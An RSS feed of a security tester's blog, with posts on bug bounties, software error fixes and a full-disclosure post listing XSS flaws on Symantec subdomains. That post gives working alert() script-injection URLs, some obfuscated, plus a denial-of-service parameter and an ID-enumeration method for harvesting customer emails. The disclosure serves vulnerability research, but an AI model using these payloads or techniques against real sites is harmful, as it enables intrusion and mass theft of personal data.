<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>The Test Manager Blog</title>
	<atom:link href="http://www.thetestmanager.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.thetestmanager.com</link>
	<description>One Test Managers thoughts on The Testing Industry &#38; WebSecurity</description>
	<lastBuildDate>Sat, 14 Apr 2012 11:31:18 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Google Security Reward Program Honorable Mention</title>
		<link>http://www.thetestmanager.com/blog/2011/03/20/google-security-reward-program-honorable-mention/</link>
		<comments>http://www.thetestmanager.com/blog/2011/03/20/google-security-reward-program-honorable-mention/#comments</comments>
		<pubDate>Sun, 20 Mar 2011 22:29:04 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Bugs]]></category>
		<category><![CDATA[Google Vulnerability Rewards]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=480</guid>
		<description><![CDATA[Well I finally made it onto the Google Security Hall of Fame. (Honourable Mention section of the page) In fact my details got added  while back, however I haven&#8217;t had the time to update the blog. The issue that got me on there was a cross site scripting issue (Self XSS in this case) in [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" title="Google Security" src="http://www.thetestmanager.com/pics/Blog/google_me.jpg" alt="Google Securtiy" width="308" height="252" /> Well I finally made it onto the <a title="Google Hall Of Fame" href="http://www.google.com/corporate/halloffame.html">Google Security Hall of Fame</a>. (Honourable Mention section of the page)</p>
<p>In fact my details got added  while back, however I haven&#8217;t had the time to update the blog.</p>
<p>The issue that got me on there was a cross site scripting issue <em>(Self XSS in this case)</em> in the invite functionality of Google Chat.</p>
<p>Google Chat is used throughout differing Google sites and all them looked like they were vulnerable; However upon checking the cookie returned it would seem that the issue lay not in the translation site or IGoogle as first thought but with GoogleUserContent which is not a site eligible for a reward.</p>
<p>I&#8217;d like to thank Adam Mein from the Google Security Team for all of his help and patience in the two and throw of helping to confirm and then assist in getting the issue fixed.</p>
<p>As everyone seems to like <a title="Public Google XSS Pics" href="http://tools.thetestmanager.com/Google_XSS/" target="_blank">pictures </a>I&#8217;ll link to a couple of them here</p>
<p><a title="IGoogle XSS " href="http://tools.thetestmanager.com/Google_XSS/IgoogleXSS.png" target="_blank">XSS 1</a></p>
<p><a title="GoogleTranslateChat.png" href="http://tools.thetestmanager.com/Google_XSS//GoogleTranslateChat.png" target="_blank">XSS 2</a></p>
<p>As for the arguments for and against paying for bugs. I&#8217;ve still not changed my stance, I&#8217;m all for it although my reasons have changed.</p>
<p>I have recently found a new bug in Chrome which would allowed an attacker to run injected code (Javascript / HTML / CSS etc <a title="XSS - Cross Site Scripting" href="http://en.wikipedia.org/wiki/Cross-site_scripting" target="_blank">read XSS</a>) into any chrome browser upon visiting a site. One thing to note about this new issue is that this is not a site problem which is the case with virtually all normal XSS issues. In this case the issue is with  Chrome. I won&#8217;t go into the issue any more just now as it&#8217;s not yet fixed. however had I not already built up a relationship with Google I would most likely have gone to <a title="ZDI by Tipping Point" href="http://www.zerodayinitiative.com/" target="_blank">Tipping Point</a> or other types of Bug Auction Sites.</p>
<p>So from my point and hopefully Google&#8217;s the program is a sucess due to the new relationships it creates between bug reporters and fixers.</p>
<p>Lastly here is a nice <a title="Google VRP Presentation" href="https://docs.google.com/present/view?id=dfgb2455_20hnx2mdhh" target="_blank">document </a>from the Goggle security team talking about the success of the reward program.</p>
<p>Martin Hall</p>
<p>The Test Manager</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2011/03/20/google-security-reward-program-honorable-mention/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google&#8217;s Vulnerability Reward Program</title>
		<link>http://www.thetestmanager.com/blog/2010/12/08/googles-vulnerability-reward-program/</link>
		<comments>http://www.thetestmanager.com/blog/2010/12/08/googles-vulnerability-reward-program/#comments</comments>
		<pubDate>Wed, 08 Dec 2010 17:23:06 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Bugs]]></category>
		<category><![CDATA[Google Vulnerability Rewards]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=467</guid>
		<description><![CDATA[Some of you may have heard that Google has recently launched a new programme to encourage responsible disclosure of security bugs in their products and websites. This scheme is called the Google Vulnerability Reward Programme. You can read more about it on Google&#8217;s security blog The basics are that anyone finding a &#8220;relevant&#8221; bug that [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 340px"><img class=" " title="Google Vulnerability Research Reward" src="http://www.thetestmanager.com/pics/Blog/google_me.jpg" alt="Google Vulnerability Research Reward" width="330" height="270" /><p class="wp-caption-text">Google Vulnerability Research Reward</p></div>
<p>Some of you may have heard that Google has recently launched a new programme to encourage responsible disclosure of security bugs in their products and websites.</p>
<p>This scheme is called the Google Vulnerability Reward Programme. You can read more about it on <a title="Google Security Blog" href="http://googleonlinesecurity.blogspot.com/2010/11/rewarding-web-application-security.html" target="_blank">Google&#8217;s security blog</a></p>
<p>The basics are that anyone finding a &#8220;relevant&#8221; bug that could compromise the serurity or privacy of Google&#8217;s customers (that&#8217;s you &amp; me) will receive a standard amount of $500.00 and if the bug found shows flair then Google may award upto $3,133.7 (spells eleet in hacker talk).</p>
<p>Now most people who try to find any bugs in Google will fail as their systems are some of the most widely used in the world and they can afford to hire the best of the best when it comes to Security Bods, System Testers (called Engineers in Test at Google) and also decent coders.</p>
<p>So we don&#8217;t therefore expect things to be easy, however I was surprised l<a title="Neal Poole" href="http://nealpoole.com/blog/tag/google-vulnerability-reward-program/" target="_blank">ike many others</a> to find quite a few issues.</p>
<p>Obviously I can&#8217;t post any details about the issues until Google give me the go ahead. However expect some posts in the near future.</p>
<p>The reward programme is a great way for System / Web Testers and Penetration Testers to try out a few things and learn something along the way.</p>
<p>One thing I will say is that Google are getting stricter on the issues reported that count</p>
<p>For example</p>
<p>I found a bug which allowed me to execute JavaScript (XSS) on virtually any of Google&#8217;s sites.  However Google deemed that it was not really a bug as it would not really be exploitable in the wild. Meaning that you couldn&#8217;t send a link or embed the malicious code on a site and have it actioned.</p>
<p>I still thought it was a major issue XSS on nearly every Google domain however they think otherwise. Either way I&#8217;ll keep the method secret in case they change their minds.</p>
<p>So you have to find issues that are going to be exploited in the real world, and also you have to find them first.</p>
<p>I also found a bug on another Google site and I submitted my report and got a reply from a security engineer that someone else had already reported the same issue before me.</p>
<p>If your thinking what&#8217;s to stop Google accepting your submissions and then just saying we already know about that one. Well the answer is nothing. It has to be a trust thing. They trust that the reporter will not exploit the bug for their own means and keep the issue secret and the reporters have to trust that Google works on honesty and wouldn&#8217;t lie just to save a few hundred or thousand dollars.</p>
<p>So if you have a few hours spare and want to have a bit of fun while learning then have a go.</p>
<p>Remember no automated tools and only test on your own account (nothing destructive).</p>
<p>Try and concentrate on a particular area which ever one you are best at. For me that would be <a title="XSS explain" href="http://en.wikipedia.org/wiki/Cross-site_scripting" target="_blank">XSS </a>while as you can see from Neal Poole&#8217;s posts. He seems to focus more on <a title="CSRF explain" href="http://en.wikipedia.org/wiki/Csrf" target="_blank">CSRF</a>.</p>
<p>Good luck.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/12/08/googles-vulnerability-reward-program/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Fix &#8211; undefined method `lines&#8217; for #</title>
		<link>http://www.thetestmanager.com/blog/2010/10/22/fix-undefined-method-lines-for/</link>
		<comments>http://www.thetestmanager.com/blog/2010/10/22/fix-undefined-method-lines-for/#comments</comments>
		<pubDate>Fri, 22 Oct 2010 13:50:42 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[code]]></category>
		<category><![CDATA[productivity]]></category>
		<category><![CDATA[tips]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=423</guid>
		<description><![CDATA[Again this is another note to myself, however it may be useful to others. Yesterday I was attempting to run a Ruby script to check for ASP .Net Padding Oracle problems on a site and I got the following issue. undefined method `lines&#8217; for #&#60;String:0x240d448&#62; I had looked at the Ruby Source code and all [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 221px"><img title="Ruby Logo" src="http://thetestmanager.com/pics/Blog/ruby_logo.jpg" alt="Ruby Logo" width="211" height="100" /><p class="wp-caption-text">Ruby Logo</p></div>
<p>Again this is another note to myself, however it may be useful to others.</p>
<p>Yesterday I was attempting to run a Ruby script to check for ASP .Net Padding Oracle problems on a site and I got the following issue.</p>
<p>undefined method `lines&#8217; for #&lt;String:0x240d448&gt;</p>
<p>I had looked at the Ruby Source code and all looked ok however there was still the issue when running the script.</p>
<p>It turns out that in Ruby Versions prior to Ruby 1.8.7 String doesn&#8217;t have a lines method and hence the error received. I was running Ruby 1.8.5</p>
<p>So the fix was a simple upgrade to the latest version of Ruby and then to run the script again and voilla the error is no more an issue.</p>
<p>Hope the above tip helps, if your receiving the same error.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/10/22/fix-undefined-method-lines-for/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fix &#8211; The Selected file cannot be opened as a solution or project &#8211; Visual Studio Work Around</title>
		<link>http://www.thetestmanager.com/blog/2010/10/04/the-selected-file-cannot-be-opened-as-a-solution-or-project-visual-studio-work-around/</link>
		<comments>http://www.thetestmanager.com/blog/2010/10/04/the-selected-file-cannot-be-opened-as-a-solution-or-project-visual-studio-work-around/#comments</comments>
		<pubDate>Mon, 04 Oct 2010 10:56:48 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[code]]></category>
		<category><![CDATA[tips]]></category>
		<category><![CDATA[VSTS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=414</guid>
		<description><![CDATA[Yesterday I brought into work an application that I had developed at home. The application was written in VB.Net using Visual Studio 2008. My work Development environment is Visual Studio 2005 and I needed to update the source code so I tried to load up the solution file and I received the error &#8220;The Selected [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 210px"><img title="Visual Studio 2005" src="http://www.thetestmanager.com/pics/Blog/Visual Studio 2005 half.jpg" alt="Visual Studio 2005" width="200" height="150" /><p class="wp-caption-text">Visual Studio 2005</p></div>
<p>Yesterday I brought into work an application that I had developed at home. The application was written in VB.Net using Visual Studio 2008.</p>
<p>My work Development environment is Visual Studio 2005 and I needed to update the source code so I tried to load up the solution file and I received the error &#8220;The Selected file cannot be opened as a solution or project. Please select a solution file or project file<strong> </strong><strong> </strong><strong> </strong><strong> </strong>&#8220;.</p>
<p>I know from past experience that .sln (solution) files are just text files with references to other code and the development environment.</p>
<p>So if you ever receive the above message and your moving code from Visual Studio 2008 to 2005 then load the sln file in a decent text editor (Notepad ++ will do)</p>
<p>change the top to lines from</p>
<p>Microsoft Visual Studio Solution File, Format Version 10.00<br />
# Visual Studio 2008</p>
<p>to read</p>
<p>Microsoft Visual Studio Solution File, Format Version 9.00<br />
# Visual Studio 2005</p>
<p>save the solution file and now open it in your 2005 development environment.</p>
<p>You may have to refactor some code if you have used new objects or syntax which are new to 2008.</p>
<p>However you should be able to to just code as normal.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/10/04/the-selected-file-cannot-be-opened-as-a-solution-or-project-visual-studio-work-around/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A BlackHat Puppet Master who wants nothing from his puppets.</title>
		<link>http://www.thetestmanager.com/blog/2010/09/13/a-blackhat-puppet-master-who-wants-nothing-from-his-puppets/</link>
		<comments>http://www.thetestmanager.com/blog/2010/09/13/a-blackhat-puppet-master-who-wants-nothing-from-his-puppets/#comments</comments>
		<pubDate>Mon, 13 Sep 2010 10:16:26 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=408</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class="wp-caption aligncenter" style="width: 490px"><img title="The Black Hat Puppet Master" src="http://imgs.xkcd.com/comics/password_reuse.png" alt="The Black Hat Puppet Master" width="480" height="1189" /><p class="wp-caption-text">The Black Hat Puppet Master</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/09/13/a-blackhat-puppet-master-who-wants-nothing-from-his-puppets/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Protected: XSS Issue in every Ebay Listing</title>
		<link>http://www.thetestmanager.com/blog/2010/09/06/xss-issue-in-every-ebay-listing/</link>
		<comments>http://www.thetestmanager.com/blog/2010/09/06/xss-issue-in-every-ebay-listing/#comments</comments>
		<pubDate>Mon, 06 Sep 2010 07:48:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=402</guid>
		<description><![CDATA[There is no excerpt because this is a protected post.]]></description>
			<content:encoded><![CDATA[<form action="http://www.thetestmanager.com/blog/wp-pass.php" method="post">
<p>This post is password protected. To view it please enter your password below:</p>
<p><label for="pwbox-402">Password:<br />
<input name="post_password" id="pwbox-402" type="password" size="20" /></label><br />
<input type="submit" name="Submit" value="Submit" /></p></form>
]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/09/06/xss-issue-in-every-ebay-listing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Full Disclosure about 20 XSS bugs on Symantec.com and related domains</title>
		<link>http://www.thetestmanager.com/blog/2010/09/03/full-disclosure-about-20-xss-bugs-on-symantec-com-and-related-domains/</link>
		<comments>http://www.thetestmanager.com/blog/2010/09/03/full-disclosure-about-20-xss-bugs-on-symantec-com-and-related-domains/#comments</comments>
		<pubDate>Fri, 03 Sep 2010 22:19:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Full Disclosure]]></category>
		<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=374</guid>
		<description><![CDATA[I have written a new tool called SubFinder (provisional name subject to change). It does exactly as the name suggests. It will find Subdomains on any given host. It will do this via a few methods, first it will look in a couple of obvious places and then it will bruteforce the rest. It will [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 270px"><img title="Symantec" src="http://www.thetestmanager.com/pics/Blog/Symantec.jpg" alt="Symantec" width="260" height="233" /><p class="wp-caption-text">Symantec 20 XSS issues</p></div>
<p>I have written a new tool called SubFinder (provisional name subject to change).</p>
<p>It does exactly as the name suggests. It will find Subdomains on any given host. It will do this via a few methods, first it will look in a couple of obvious places and then it will bruteforce the rest.</p>
<p>It will be released in the next couple of days.</p>
<p>I wanted to test it so I ran it against <a title="Symantec.com" href="http://www.Symantec.com" target="_blank">Symantec.com</a></p>
<p>I got over 200 subdomains found. (not all could be browsed, but loads were)</p>
<p>From the domain list I thought i would check some of them over for XSS issues. The reason that you will find more issues is because firstly these sub domains are usually used to host mini sites, or sub sites. When/If there is a code review then these can be missed.</p>
<p>Also SubDomains are more often than not coded by outsourced suppliers so even if Symantec had great processes in place (which they don&#8217;t) , there is a chance that the outsourced suppliers do not.</p>
<p>(1) <a title="symantecenterprise XSS" href="https://symantecenterprise.rsys3.net/servlet/campaignrespondent?FIRSTNAME=qq&amp;LASTNAME=qqqq&amp;COMPANY=qqqq&amp;JOBTITLE=Vice+President&amp;ADDRESS1=qqqq&amp;ADDRESS2=qqqq&amp;CITY=qqqq&amp;STATEPROVINCE=AK&amp;COUNTRY=United+States+of+America&amp;POSTALCODE=90210&amp;PHONENUMBER=999&amp;EMAIL=qqqq%40aaa&amp;COMPANYSIZE=1+to+10&amp;QUESTION=ttm&lt;/textarea&gt; &lt;br /&gt;&lt;script&gt;alert(%27The TestManager SymanTec Xss SubFinderTest%27)&lt;/script&gt;&amp;button=Submit&amp;_RequiredFields_=FIRSTNAME%2CLASTNAME%2CCOMPANY%2CJOBTITLE%2CADDRESS1%2CCITY%2CSTATEPROVINCE%2CCOUNTRY%2CPOSTALCODE%2CPHONENUMBER%2CEMAIL%2CCOMPANYSIZE&amp;_EMailFields_=EMAIL&amp;_RealFields_=&amp;_IntegerFields_=&amp;_BannedFields_=TRUE&amp;_ID_=symc.2114.-2&amp;Campaign_=JK_Form_RequestSalesCall_MASTER&amp;charset_=UTF-8&amp;_InlineResponseRule_=true&amp;_Sent_=2010-08-23+16%3A19%3A41.610&amp;ACTIVITYCODE=92078&amp;EMail_=92078&amp;__HIDDEN_FIELD_NAMES__=_RequiredFields_%3B_EMailFields_%3B_RealFields_%3B_IntegerFields_%3B_BannedFields_%3B_ID_%3BCampaign_%3Bcharset_%3B_InlineResponseRule_%3B_Sent_%3BACTIVITYCODE%3BEMail_%3B__HIDDEN_FIELD_NAMES__" target="_blank">symantecenterprise XSS </a><span id="hwytop"> </span><span id="hwytop"> </span></p>
<p>(2) <a title="Symantec Connect Search" href="http://www.symantec.com/connect/search?filters=http://www.symantec.com/connect/search?filters=0244ttm--';alert('XSS_on_Symantec_TheTestManager.com');//" target="_blank">Symantec Connect Search Feature XSS</a><span id="hwytop"> </span><span id="hwytop"> </span><span id="hwytop"> </span><span id="hwytop"> </span> (IE Only?)</p>
<p>(3)<span style="text-decoration: line-through;"> <a title="ET.Symantec XSS" href="https://et.symantec.com/signup/thanks.html?fn=ttm&lt;/div&gt;&lt;script&gt;alert(%27The TestManager SymanTec Xss SubFinderTest%27)&lt;/script&gt;&amp;em=aaaa@aaa.c" target="_blank">https://et.symantec.com XSS</a></span> (<strong>Fixed 17th November 2010?)</strong></p>
<p>(4) <a title="MailList Symantec XSS" href="http://maillist.entsupport.symantec.com/subscribe.asp?ddProduct=18d4ttm--&quot;&gt;&lt;/form&gt;&lt;script&gt;alert('The Test Manager.com Sub Finder Symantec Test')&lt;/script&gt;&amp;EmailAddress=&amp;password=" target="_blank">http://maillist.entsupport.symantec.com XSS<br />
</a><br />
(5) <span style="text-decoration: line-through;">Bit of a strnge one this, if you go to <a title="RenewalCentre" href="https://renewalcenter.symantec.com/storefront/app/storefront.jsp?action=transferReloadCheckAccount&amp;_requestid=194899" target="_blank">https://renewalcenter.symantec.com/<br />
</a>and into the email  box type<br />
&#8220;&gt;&lt;&lt;/div&gt;&lt;script&gt;alert(&#8216;The TestManager SymanTec Xss SubFinderTest&#8217;)&lt;/script&gt;<br />
you should get an error which states invalid email address entered.<br />
Now change the URL to<br />
<a title="Stored Symantec?" href="https://renewalcenter.symantec.com/storefront/app//storefront.jsp?action=transferReloadLogin&amp;success=yes&amp;_requestid=185580" target="_blank">https://renewalcenter.symantec.com</a></span> <span style="text-decoration: line-through;"><br />
and Bingo XSS (is it being stored? making it a sotred XSS<br />
I don&#8217;t think so but not 100% sure)</span> <strong>(Fixed 17th November 2010?)</strong></p>
<p>(6) <span style="text-decoration: line-through;"><a title="Symantec Knowledge Centre XSS" href="http://bit.ly/dxBAY4" target="_blank">http://www.symantec.com/ XSS</a> (IE browsers only?)</span> <strong>(Fixed 17th November 2010?)</strong></p>
<p>(7) <span style="text-decoration: line-through;">open redirect to XSS &#8211; <a title="MessageLabs Redirect XSS" href="http://www.messagelabs.co.uk/resources/blog.aspx?link=javascript:alert(%27The Test Manager Sub Finder Symantec XSS Test%27)" target="_blank">http://www.messagelabs.co.uk/ XSS</a> &#8211; Seems to only work in Firefox?, and not in IE?</span> <strong>(Fixed 17th November 2010?)</strong></p>
<p>(8) <span style="text-decoration: line-through;"><a title="Connect Forward XSS Symantec" href="http://bit.ly/c30JUN" target="_blank">http://www.symantec.com/ Connect Forward XSS</a> IE only?</span> <strong>(Fixed 17th November 2010?)</strong></p>
<p>(9) <span style="text-decoration: line-through;"><a title="Other Possible Sites." href="https://symantecevents.verite.com/?action=event.dsp_cancel&amp;event_id=17895&amp;error=ttm--%3C/div%3E%3Cscript%3Ealert%28String.fromCharCode%2884,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,115,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116%29%29%3C/script%3Etest" target="_blank">https://symantecevents XSS<br />
</a>Site development on the above seems to have outsourced to<br />
<a title="Other Possible Sites." href="http://verite.com/our-work/by-client/client-focus/?client_id=2" target="_blank">http://verite.com/our-work/by-client/client-focus/?client_id=2</a></span> <span style="text-decoration: line-through;"><br />
I&#8217;m guessing all of their sites for symantec would be easy targets.</span> <strong>(Fixed 17th November 2010?)</strong></p>
<p>(10) <a title="Seer Symantec XSS" href="http://seer.entsupport.symantec.com/email_forms/sendmail.asp?ddProduct=&amp;SrvURL=&amp;type=10&amp;strName=a&amp;strEmail=ttm--%3C/p%3E%3Cscript%3Ealert%28%22TheTestManager%20Sub%20Finder%20Symantec%20test%22%29%3C/script%  3E&amp;topic=symantec&amp;strBODY=aaa&amp;submit2=Send" target="_blank">http://seer.entsupport.symantec.com/ XSS</a></p>
<p>(11) <a title="AKA Community Symantec XSS" href="http://bit.ly/c2fYL7" target="_blank">http://aka-community.symantec.com</a></p>
<p>(12) <a title="Careers Symantec XSS" href="http://bit.ly/bMEREs" target="_blank">https://careers.symantec.com/ XSS </a> (may need to visit page twice as the<br />
first time sets the cookie)</p>
<p>(13) <a title="Chat Symantec XSS" href="https://chat.symantec.com/sdcxuser/lachat/user/reentry.asp?email=ttm--%22&gt;&lt;script&gt;alert(%27XSS TEST%27)&lt;/script&gt;&amp;lg=en&amp;noqcode=" target="_blank">https://chat.symantec.com XSS</a></p>
<p>(15) <a title="WWW4 Symantec XSS" href="https://www4.symantec.com/Vrt/vrtcontroller?EMAIL=ttm--%22&gt;&lt;script&gt;alert(%27The Test Manager Subfinder Xss   Symantec%27)&lt;/script&gt;&amp;PASSWD=a&amp;CONFIRM_PASSWD=a&amp;a_id=48182&amp;s_id=70&amp;p_id=null&amp;COMMAND_DESTINATION_URL=null&amp;REDIRECT_PAGE=null&amp;p_locale=en_US&amp;l_id=&amp;article_title=Results&amp;t_id=62243672&amp;t_s=1283128779469&amp;EMAIL_AS_  USER_FLAG=Y&amp;FRM_ACTION=Create+Account&amp;ru=null" target="_blank">https://www4.symantec.com/ XSS</a></p>
<p>(16) <a title="NavBar Symantec XSS" href="http://seer.entsupport.symantec.com/nav_bar/side_nav.asp?ddProduct=ttm%22%3E%3Cscript%3Ealert%28%27The%20Test%20Manager%20Sub%20Finder%20Xss%20symantec%20Test%27%29%3C/script%3E" target="_blank">http://seer.entsupport.symantec.com/ Navbar XSS</a></p>
<p>(17) Ouch Denial Of Service (DOS) via Bad Param Injection =<br />
<a title="Tech Center Symantec Home" href="http://techcenter.symantec.com" target="_blank">http://techcenter.symantec.com</a> redirect to <a title="Tech Center Symantec Enterprise" href="http://techcenter.symantec.com/ecampus/enterprise" target="_blank">http://techcenter.symantec.com/ecampus/enterprise</a> =<br />
which works fine as do all other URLs on this techcenter subdomain.<br />
However if I now use the url =<br />
<a title="Symantec Denial of Service TechCenter" href="http://techcenter.symantec.com/ecampus/enterprise" target="_blank">http://techcenter.symantec.com/ecampus/enterprise?cat=null&amp;cmd=sc&amp;courseNo=DP6000&amp;EXValue=null&amp;file=null&amp;module&amp;page=null&amp;siteName=sena&amp;type=g_</a><br />
Then every url on that subdomain gets blown and the server responds with a http 500server error. This creates a Denial of Service on that Subdomain.</p>
<p>(18) <a title="Norton Cybercrime XSS" href="http://cybercrimenews.norton.com/cgi-bin/search.cgi?target=ttm--%22&gt;&lt;script&gt;alert(%27The Test Manager XSS Sub Finder Tool Test%27)&lt;/script&gt;&amp;rule=any&amp;page=2" target="_blank">http://cybercrimenews.norton.com XSS</a></p>
<p>(19) <span class="status-body"><span class="status-content"><span class="entry-content">Every Symantec customer email address can be grabbed = <a class="tweet-url web" rel="nofollow" href="http://bit.ly/91fZrT" target="_blank">http://bit.ly/91fZrT</a> just change the id. you could start at 1 and work your way up. This is very easy to automate. looks like over 16 million potential email addresses?.</span></span></span></p>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 170px; width: 1px; height: 1px; overflow: hidden;">(1)</p>
<p>https://symantecenterprise.rsys3.net/servlet/campaignrespondent?FIRSTNAME=qq&#038;LASTNAME=qqqq&#038;COMPANY=qqqq&#038;JOBTITLE=Vice+President&#038;ADDRESS1=qqqq&#038;ADDRESS2=qqqq&#038;CITY=qqqq&#038;STATEPROVINCE=AK&#038;COUNTRY=United+States+of</p>
<p>+America&amp;POSTALCODE=90210&amp;PHONENUMBER=999&amp;EMAIL=qqqq%40aaa&amp;COMPANYSIZE=1+to+10&amp;QUESTION=0659ttm&lt;/textarea&gt; &lt;br /&gt;&lt;script&gt;alert(&#8216;The TestManager SymanTec Xss SubFinder</p>
<p>Test&#8217;)&lt;/script&gt;&amp;button=Submit&amp;_RequiredFields_=FIRSTNAME%2CLASTNAME%2CCOMPANY%2CJOBTITLE%2CADDRESS1%2CCITY%2CSTATEPROVINCE%2CCOUNTRY%2CPOSTALCODE%2CPHONENUMBER%2CEMAIL%2CCOMPANYSIZE&amp;_EMailFields_=EMAIL&amp;_Real</p>
<p>Fields_=&amp;_IntegerFields_=&amp;_BannedFields_=TRUE&amp;_ID_=symc.2114.-2&amp;Campaign_=JK_Form_RequestSalesCall_MASTER&amp;charset_=UTF-8&amp;_InlineResponseRule_=true&amp;_Sent_=2010-08-23+16%3A19%3A41.610&amp;ACTIVITYCODE=92078&amp;EMail_</p>
<p>=92078&amp;__HIDDEN_FIELD_NAMES__=_RequiredFields_%3B_EMailFields_%3B_RealFields_%3B_IntegerFields_%3B_BannedFields_%3B_ID_%3BCampaign_%3Bcharset_%3B_InlineResponseRule_%3B_Sent_%3BACTIVITYCODE%3BEMail_%3B__HIDD</p>
<p>EN_FIELD_NAMES__</p>
<p>(2)</p>
<p>http://www.symantec.com/connect/search?filters=01a1ttm&#8211;&#8221;);&lt;/script&gt;&lt;script&gt;alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,115,115,32,83,</p>
<p>117,98,70,105,110,100,101,114,32,84,101,115,116))&lt;/script&gt;</p>
<p>(3) https://et.symantec.com/signup/thanks.html?fn=ttm&lt;/div&gt;&lt;script&gt;alert(&#8216;The TestManager SymanTec Xss SubFinderTest&#8217;)&lt;/script&gt;&amp;em=aaaa@aaa.c</p>
<p>(4) http://maillist.entsupport.symantec.com/subscribe.asp?ddProduct=18d4ttm&#8211;&#8221;&gt;&lt;/form&gt;&lt;script&gt;alert(&#8216;The Test Manager.com Sub Finder Symantec Test&#8217;)&lt;/script&gt;&amp;EmailAddress=&amp;password=</p>
<p>(5) Bit of a strnge one this, if you go to https://renewalcenter.symantec.com/storefront/app/storefront.jsp?action=transferReloadCheckAccount&amp;_requestid=99999<br />
and into the email  box type<br />
&#8220;&gt;&lt;&lt;/div&gt;&lt;script&gt;alert(&#8216;The TestManager SymanTec Xss SubFinderTest&#8217;)&lt;/script&gt;<br />
you should get an error which states invalid email address entered.<br />
Now change the URL to</p>
<p>https://renewalcenter.symantec.com/storefront/app//storefront.jsp?action=transferReloadLogin&#038;success=yes&#038;_requestid=99999</p>
<p>and Bingo XSS (is it being stored? making it a sotred XSS &#8211; I don&#8217;t think so but not 100% sure)</p>
<p>(6) http://www.symantec.com/business/support/knowledge_base_results.jsp?SearchTerm=ttm&#8221;/&gt;&lt;script&gt;alert(&#8216;The TestManager SymanTec Xss SubFinderTest&#8217;)&lt;/script&gt;&amp;ddProduct=&amp;pid=&amp;content=all</p>
<p>(7) open redirect to XSS &#8211; http://www.messagelabs.co.uk/resources/blog.aspx?link=javascript:alert(&#8216;The Test Manager Sub Finder Symantec XSS Test&#8217;) &#8211; Seems to only work in Firefox? , and not in IE?</p>
<p>(8) http://www.symantec.com/connect/forward?path=2e6fttm&#8211;&#8221;);&lt;/script&gt;&lt;script&gt;alert(&#8216;The Test Manager XSS Test for Sub FInder&#8217;)&lt;/script&gt;</p>
<p>(9)</p>
<p>https://symantecevents.verite.com/?action=main.dsp_register&#038;error=42f2ttm&#8211;&lt;/div&gt;&lt;script&gt;alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,1</p>
<p>15,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))&lt;/script&gt;<br />
Site development on the above seems to have outsourced to http://verite.com/our-work/by-client/client-focus/?client_id=2&amp; &#8211; I&#8217;m guessing all of their sites for symantec would be easy targets.</p>
<p>(10)</p>
<p>http://seer.entsupport.symantec.com/email_forms/sendmail.asp?ddProduct=&#038;SrvURL=&#038;type=10&#038;strName=a&#038;strEmail=ttm&#8211;%3C/p%3E%3Cscript%3Ealert%28%22TheTestManager%20Sub%20Finder%20Symantec%20test%22%29%3C/script%</p>
